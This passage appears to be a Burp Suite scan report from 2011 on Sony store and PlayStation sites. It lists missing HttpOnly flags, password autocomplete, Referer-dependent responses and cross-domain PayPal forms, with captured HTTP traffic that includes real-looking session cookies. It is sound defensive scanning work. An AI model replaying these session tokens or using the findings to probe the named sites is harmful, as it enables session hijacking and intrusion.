s_channel=%5B%5B%27Other%27%2C%271308842437917%27%5D%5D; s_sq=%5B%5BB%5D%5D; fsr.a=1308842438745

Response

HTTP/1.1 200 OK
ntCoent-Length: 215
Content-Type: text/xml
Content-Language: en-US
Content-Length: 215
Vary: Accept-Encoding
Date: Thu, 23 Jun 2011 15:20:39 GMT
Connection: close
Set-Cookie: TS5bbf46=bf993e9f934dbd72f3971d5cefc73a642c2d2c068de0310e4e0359c7; Path=/
Cache-Control: private
Pragma: no-cache

<?xml version="1.0" encoding="UTF-8"?>
<ajax-response>
<response type="object" id="ReturnProductInfoObject">
<productInformation id="products">
{
"products":
{
}
}
</productInformation>
</response>
<
...[SNIP]...

6.26. http://www.sonystyle.com/webapp/wcs/stores/servlet/SYRedirectURLControllerCmd previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sonystyle.com
Path:	/webapp/wcs/stores/servlet/SYRedirectURLControllerCmd

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TS5bbf46=bbd31f42cd1bb660e737709398a01a9a78da968d1dfc8e8b4e0359c4; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/wcs/stores/servlet/SYRedirectURLControllerCmd?source=/4a76d HTTP/1.1
Host: www.sonystyle.com
Proxy-Connection: keep-alive
Referer: http://burp/show/6
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; s_vi=[CS]v1|2701AA430515874D-60000181000007CB[CE]; JSESSIONID=0000GBxzJ8ocWqxo7Twu8MoxGDb:14aelt0ld; WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=yvTBhIsIzJXeq0V1jN5EG7plRAA%3d%0a%3b2011%2d06%2d23+10%3a58%3a28%2e003%5f1308841107995%2d82466%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2clUuR4QTxf%2f5YInkNp5DLwEIROKszrQDAawe%2bFWWFEzIDxeUPIdTDYWkA5rkgPjRP7uidpXvVAq2h%0aJC2GZox%2bEO9n57RB95%2fBJ6N%2fOyuJlvGbaiD7FrSmImcI6%2bWFUECX5dn2JvAzvA5MAH9zFwLDmQ%3d%3d; WC_GENERIC_ACTIVITYDATA=[1131585542%3atrue%3afalse%3a0%3aOJQ8PE3BCkIUlGMHsRAnJG9WJb4%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|null%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10504%2610504%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; mbox=session#1308841090453-474854#1308844043|PC#1308841090453-474854.17#1310051783|check#true#1308842243; ensRefId=http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551&XID=M:sidenav:esupport; ensUID=17410958ILJeqRHT23LY; s_cc=true; s_visit=1; c_m=undefinedM%3Asidenav%3AesupportM%3Asidenav%3Aesupportundefined; s_channel=%5B%5B%27Other%27%2C%271308842183820%27%5D%5D; s_sq=%5B%5BB%5D%5D; fsr.s={"v":1,"rid":"1308841108174_99949","cp":{"cybershot":"N","innovation":"N","experts":"N"},"pv":2,"c":"http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay","lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0}; 71737897-VID=16101514677756; 71737897-SKEY=4916265021794629949; HumanClickSiteContainerID_71737897=STANDALONE; TS5bbf46=95277153801327c970f2ee5e018528035e46b2c7608495f34e0359a9db2332020de46713222f7b4ed69e61a0

Response

HTTP/1.1 302 Moved Temporarily
Referer: http://burp/show/6
Location: http://www.sonystyle.com
Content-Length: 0
Content-Type: text/html
Content-Language: en-US
Vary: Accept-Encoding
Date: Thu, 23 Jun 2011 15:20:36 GMT
Connection: close
Set-Cookie: TS5bbf46=bbd31f42cd1bb660e737709398a01a9a78da968d1dfc8e8b4e0359c4; Path=/
Cache-Control: private

6.27. http://www.sonystyle.com/webapp/wcs/stores/servlet/SYWishListDisplay previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sonystyle.com
Path:	/webapp/wcs/stores/servlet/SYWishListDisplay

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

WC_PERSISTENT=NcxPoQ35T9OIG2xvyDBqCI7m%2f6I%3d%0a%3b2011%2d06%2d23+11%3a19%3a56%2e636%5f1308841107995%2d82466%5f10151%5f241903389%2c%2d1%2cUSD%5f10151; Expires=Tue, 20 Dec 2011 15:19:56 GMT; Path=/
WC_USERACTIVITY_241903389=241903389%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c7myjYVzeSmGi%2bSmSHBDsv5QE%2fLHtPO66u%2fvUa%2fYlSe5zgSuFTJCb5MP4YHwzkoVFU539TML12c%2fn%0aUvMgKy33JgbQLeMW1w%2b5FRcSl5w0xRgy7RkTPOUihpdheDWGKGdU5kOAsbyKsSyrEcwSZhZUfA%3d%3d; Path=/
TS5bbf46=4315494d6d4225f09c2745a0fa6895375e46b2c7608495f34e0358cadb2332024890f70e222f7b4e4890f70e471aa5e16f42170c; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/SYWishListDisplay HTTP/1.1
Host: www.sonystyle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
ntCoent-Length: 73255
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 23 Jun 2011 15:19:57 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: WC_PERSISTENT=NcxPoQ35T9OIG2xvyDBqCI7m%2f6I%3d%0a%3b2011%2d06%2d23+11%3a19%3a56%2e636%5f1308841107995%2d82466%5f10151%5f241903389%2c%2d1%2cUSD%5f10151; Expires=Tue, 20 Dec 2011 15:19:56 GMT; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=DEL; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=DEL; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/
Set-Cookie: WC_USERACTIVITY_241903389=241903389%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c7myjYVzeSmGi%2bSmSHBDsv5QE%2fLHtPO66u%2fvUa%2fYlSe5zgSuFTJCb5MP4YHwzkoVFU539TML12c%2fn%0aUvMgKy33JgbQLeMW1w%2b5FRcSl5w0xRgy7RkTPOUihpdheDWGKGdU5kOAsbyKsSyrEcwSZhZUfA%3d%3d; Path=/
Set-Cookie: TS5bbf46=4315494d6d4225f09c2745a0fa6895375e46b2c7608495f34e0358cadb2332024890f70e222f7b4e4890f70e471aa5e16f42170c; Path=/
Cache-Control: private
Pragma: no-cache
Content-Length: 73255

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>

<script type="text/javascript" src="//nexus2.e
...[SNIP]...

6.28. http://www.sonystyle.com/webapp/wcs/stores/servlet/SYWishListDisplay previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sonystyle.com
Path:	/webapp/wcs/stores/servlet/SYWishListDisplay

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

WC_PERSISTENT=gKhUalwoDI2z%2bNprXZ4zIKFzImo%3d%0a%3b2011%2d06%2d23+11%3a19%3a57%2e352%5f1308841107995%2d82466%5f10151%5f241903390%2c%2d1%2cUSD%5f10151; Expires=Tue, 20 Dec 2011 15:19:57 GMT; Path=/
WC_USERACTIVITY_241903390=241903390%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cP6bHMHjytG4oMGqREaYXQdgrhlLJv3qbvnxtslAf5G4pPtDsUOINJCueV5cMMwxhx5ni8RjGeSOa%0asInl12kMoEjmCmyUzHwfxteaIruGewQaiLBIDV0gTI%2bF6NR9bXRaayEonpmxIhImeBdp%2fZ1DQQ%3d%3d; Path=/
TS5bbf46=8cda39d87185f14d1bf971f120ead6895e46b2c7608495f34e0358cadb2332024890f70e222f7b4e4890f70e6ced6c50a378910e; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/SYWishListDisplay?langId=-1&storeId=10151&catalogId=10551 HTTP/1.1
Host: www.sonystyle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.29. http://www.us.playstation.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.us.playstation.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SONYCOOKIE1=2892277952.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.us.playstation.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 23 Jun 2011 15:20:29 GMT
Server: Apache
Location: http://us.playstation.com/
Content-Length: 306
Keep-Alive: timeout=300
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: SONYCOOKIE1=2892277952.20480.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://us.playstation.c
...[SNIP]...

6.30. http://www.us.playstation.com/Support previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.us.playstation.com
Path:	/Support

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SONYCOOKIE1=2892277952.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Support HTTP/1.1
Host: www.us.playstation.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 23 Jun 2011 15:20:29 GMT
Server: Apache
Location: http://us.playstation.com/Support
Content-Length: 313
Keep-Alive: timeout=300
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: SONYCOOKIE1=2892277952.20480.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://us.playstation.c
...[SNIP]...

7. Password field with autocomplete enabled previous next
There are 3 instances of this issue:

http://twitter.com/sonyoutletusa
http://www.facebook.com/sonyelectronics
https://www.sonystyle.com/webapp/wcs/stores/servlet/CRMPortalHome

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

7.1. http://twitter.com/sonyoutletusa previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/sonyoutletusa

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

GET /sonyoutletusa HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

7.2. http://www.facebook.com/sonyelectronics previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/sonyelectronics

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

GET /sonyelectronics HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

7.3. https://www.sonystyle.com/webapp/wcs/stores/servlet/CRMPortalHome previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.sonystyle.com
Path:	/webapp/wcs/stores/servlet/CRMPortalHome

Issue detail

The page contains a form with the following action URL:

https://www.sonystyle.com/webapp/wcs/stores/servlet/Logon

The form contains the following password field with autocomplete enabled:

logonPassword

Request

GET /webapp/wcs/stores/servlet/CRMPortalHome HTTP/1.1
Host: www.sonystyle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
ntCoent-Length: 78487
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 23 Jun 2011 15:20:27 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: private
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: No-cache
Content-Length: 78487

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
</label>
<input name="logonPassword" maxlength="25" type="password" /></li>
...[SNIP]...

8. Referer-dependent response previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Referer-based access controls, where the application assumes that if you have arrived from one privileged location then you are authorised to access another privileged location. These controls can be trivially defeated by supplying an accepted Referer header in requests for the vulnerable function.
Attempts to prevent cross-site request forgery attacks by verifying that requests to perform privileged actions originated from within the application itself and not from some external location. Such defences are not robust - methods have existed through which an attacker can forge or mask the Referer header contained within a target user's requests, by leveraging client-side technologies such as Flash and other techniques.
Delivery of Referer-tailored content, such as welcome messages to visitors from specific domains, search-engine optimisation (SEO) techniques, and other ways of tailoring the user's experience. Such behaviours often have no security impact; however, unsafe processing of the Referer header may introduce vulnerabilities such as SQL injection and cross-site scripting. If parts of the document (such as META keywords) are updated based on search engine queries contained in the Referer header, then the application may be vulnerable to persistent code injection attacks, in which search terms are manipulated to cause malicious content to appear in responses served to other application users.

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses is updated based on Referer data, then the same defences against malicious input should be employed here as for any other kinds of user-supplied data.

Request 1

GET /plugins/likebox.php?id=196942217311&width=248&height=291&connections=8&stream=false&header=true HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://cyberghostvpn.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: locale=en_US; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response 1

Request 2

GET /plugins/likebox.php?id=196942217311&width=248&height=291&connections=8&stream=false&header=true HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: locale=en_US; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response 2

9. Cross-domain POST previous next
There are 23 instances of this issue:

http://wiki.novemberborn.net/sifr3/DetectingCSSLoad
http://wiki.novemberborn.net/sifr3/JavaScript+Configuration
http://wiki.novemberborn.net/sifr3/JavaScript+Methods
http://wiki.novemberborn.net/sifr3/Styling
http://www.huddletogether.com/projects/lightbox2/
http://www.omnitechsupport.com/
http://www.omnitechsupport.com/
http://www.omnitechsupport.com/about.php
http://www.omnitechsupport.com/fee.php
http://www.omnitechsupport.com/fee.php
http://www.omnitechsupport.com/fee.php
http://www.omnitechsupport.com/fee.php
http://www.omnitechsupport.com/fee.php
http://www.omnitechsupport.com/fee.php
http://www.omnitechsupport.com/fee.php
http://www.omnitechsupport.com/fee.php
http://www.omnitechsupport.com/fee.php
http://www.omnitechsupport.com/fee.php
http://www.omnitechsupport.com/fee.php
http://www.omnitechsupport.com/fee.php
http://www.omnitechsupport.com/fee.php
http://www.omnitechsupport.com/spyware_removal.php
http://www.omnitechsupport.com/spyware_removal.php

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.

9.1. http://wiki.novemberborn.net/sifr3/DetectingCSSLoad previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://wiki.novemberborn.net
Path:	/sifr3/DetectingCSSLoad

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

cmd
submit
encrypted

Request

GET /sifr3/DetectingCSSLoad HTTP/1.1
Host: wiki.novemberborn.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:19:35 GMT
Server: Apache
Served-By: Joyent
Last-Modified: Wed, 25 Feb 2009 20:37:20 GMT
ETag: "679-1b17-463c433c30000"
Accept-Ranges: bytes
Content-Length: 6935
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>
<head>
<title>DetectingCSSLoad in sIFR 3 Documentation & FAQ</title>

<link href="/styleshee
...[SNIP]...
</p>

<form action="https://www.paypal.com/cgi-bin/webscr" method="post">
<p class="img">
...[SNIP]...

9.2. http://wiki.novemberborn.net/sifr3/JavaScript+Configuration previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://wiki.novemberborn.net
Path:	/sifr3/JavaScript+Configuration

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

cmd
submit
encrypted

Request

GET /sifr3/JavaScript+Configuration HTTP/1.1
Host: wiki.novemberborn.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:19:35 GMT
Server: Apache
Served-By: Joyent
Last-Modified: Wed, 25 Feb 2009 22:00:23 GMT
ETag: "68d-29fb-463c55cc58bc0"
Accept-Ranges: bytes
Content-Length: 10747
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>
<head>
<title>JavaScript Configuration in sIFR 3 Documentation & FAQ</title>

<link href="/s
...[SNIP]...
</p>

<form action="https://www.paypal.com/cgi-bin/webscr" method="post">
<p class="img">
...[SNIP]...

9.3. http://wiki.novemberborn.net/sifr3/JavaScript+Methods previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://wiki.novemberborn.net
Path:	/sifr3/JavaScript+Methods

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

cmd
submit
encrypted

Request

GET /sifr3/JavaScript+Methods HTTP/1.1
Host: wiki.novemberborn.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:19:35 GMT
Server: Apache
Served-By: Joyent
Last-Modified: Sun, 29 Nov 2009 17:29:14 GMT
ETag: "68e-3de8-47985dd1b2e80"
Accept-Ranges: bytes
Content-Length: 15848
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>
<head>
<title>JavaScript Methods in sIFR 3 Documentation & FAQ</title>

<link href="/stylesh
...[SNIP]...
</p>

<form action="https://www.paypal.com/cgi-bin/webscr" method="post">
<p class="img">
...[SNIP]...

9.4. http://wiki.novemberborn.net/sifr3/Styling previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://wiki.novemberborn.net
Path:	/sifr3/Styling

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

cmd
submit
encrypted

Request

GET /sifr3/Styling HTTP/1.1
Host: wiki.novemberborn.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:19:36 GMT
Server: Apache
Served-By: Joyent
Last-Modified: Sun, 29 Nov 2009 17:32:47 GMT
ETag: "699-2c27-47985e9cd4dc0"
Accept-Ranges: bytes
Content-Length: 11303
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>
<head>
<title>Styling in sIFR 3 Documentation & FAQ</title>

<link href="/stylesheets/instik
...[SNIP]...
</p>

<form action="https://www.paypal.com/cgi-bin/webscr" method="post">
<p class="img">
...[SNIP]...

9.5. http://www.huddletogether.com/projects/lightbox2/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.huddletogether.com
Path:	/projects/lightbox2/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

cmd
business
item_name
no_note
currency_code
tax
bn
submit

Request

GET /projects/lightbox2/ HTTP/1.1
Host: www.huddletogether.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:19:43 GMT
Server: Apache
Last-Modified: Fri, 18 Mar 2011 17:56:45 GMT
ETag: "a0be022-2f25-49ec5804b3140"
Accept-Ranges: bytes
Content-Length: 12069
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>

   <title>Lightbox 2<
...[SNIP]...
</p>

<form name="_xclick" action="https://www.paypal.com/cgi-bin/webscr" method="post">
       <fieldset>
...[SNIP]...

9.6. http://www.omnitechsupport.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omnitechsupport.com
Path:	/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

submit
display
business
cmd

Request

GET / HTTP/1.1
Host: www.omnitechsupport.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=249362713.1308841199.1.1.utmcsr=docs.sony.com|utmccn=(referral)|utmcmd=referral|utmcct=/startchat.asp; __utma=249362713.1982867696.1308841199.1308841199.1308841199.1; __utmc=249362713; __utmb=249362713.1.10.1308841199

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:14:55 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39435

<html>
<head>
<title>Tech Support | IT Support | Online IT Support - Omnitechsupport.com</title>
<meta name="description" content="Omnitechsupport.com, the nation's leading tech support and IT supp
...[SNIP]...
<tr>
<form target="paypal" action="https://www.paypal.com/cgi-bin/webscr" method="post">
<td width="254" rowspan="2" align="center" valign="middle">
...[SNIP]...

9.7. http://www.omnitechsupport.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omnitechsupport.com
Path:	/

Issue detail

The page contains a form which POSTs data to the domain secure.logmeinrescue.com. The form contains the following fields:

question

Request

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:14:55 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39435

<html>
<head>
<title>Tech Support | IT Support | Online IT Support - Omnitechsupport.com</title>
<meta name="description" content="Omnitechsupport.com, the nation's leading tech support and IT supp
...[SNIP]...
<table width="100%" border="0" cellpadding="0" cellspacing="0">
<form name="form1" method="post" action="https://secure.logmeinrescue.com/Customer/Download.aspx?EntryID=215642">
<tr>
...[SNIP]...

9.8. http://www.omnitechsupport.com/about.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omnitechsupport.com
Path:	/about.php

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

submit
display
business
cmd

Request

GET /about.php HTTP/1.1
Host: www.omnitechsupport.com
Proxy-Connection: keep-alive
Referer: http://www.omnitechsupport.com/fee.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=249362713.1308841199.1.1.utmcsr=docs.sony.com|utmccn=(referral)|utmcmd=referral|utmcct=/startchat.asp; __utma=249362713.1982867696.1308841199.1308841199.1308841199.1; __utmc=249362713; __utmb=249362713.4.10.1308841199

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:15:43 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32487

<html>
<head>
<title>Remote computer maintenance, remote pc help desk & pc services at affordable prices</title>
<meta name="description" content="provides desktop takeover solutions, remote pc
...[SNIP]...
<tr>
<form target="paypal" action="https://www.paypal.com/cgi-bin/webscr" method="post">
<td width="254" rowspan="2" align="center" valign="middle">
...[SNIP]...

9.9. http://www.omnitechsupport.com/fee.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omnitechsupport.com
Path:	/fee.php

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

submit
add
cmd
business
item_name
item_number
amount
page_style
no_shipping
no_note
currency_code
lc
bn

Request

GET /fee.php HTTP/1.1
Host: www.omnitechsupport.com
Proxy-Connection: keep-alive
Referer: http://www.omnitechsupport.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
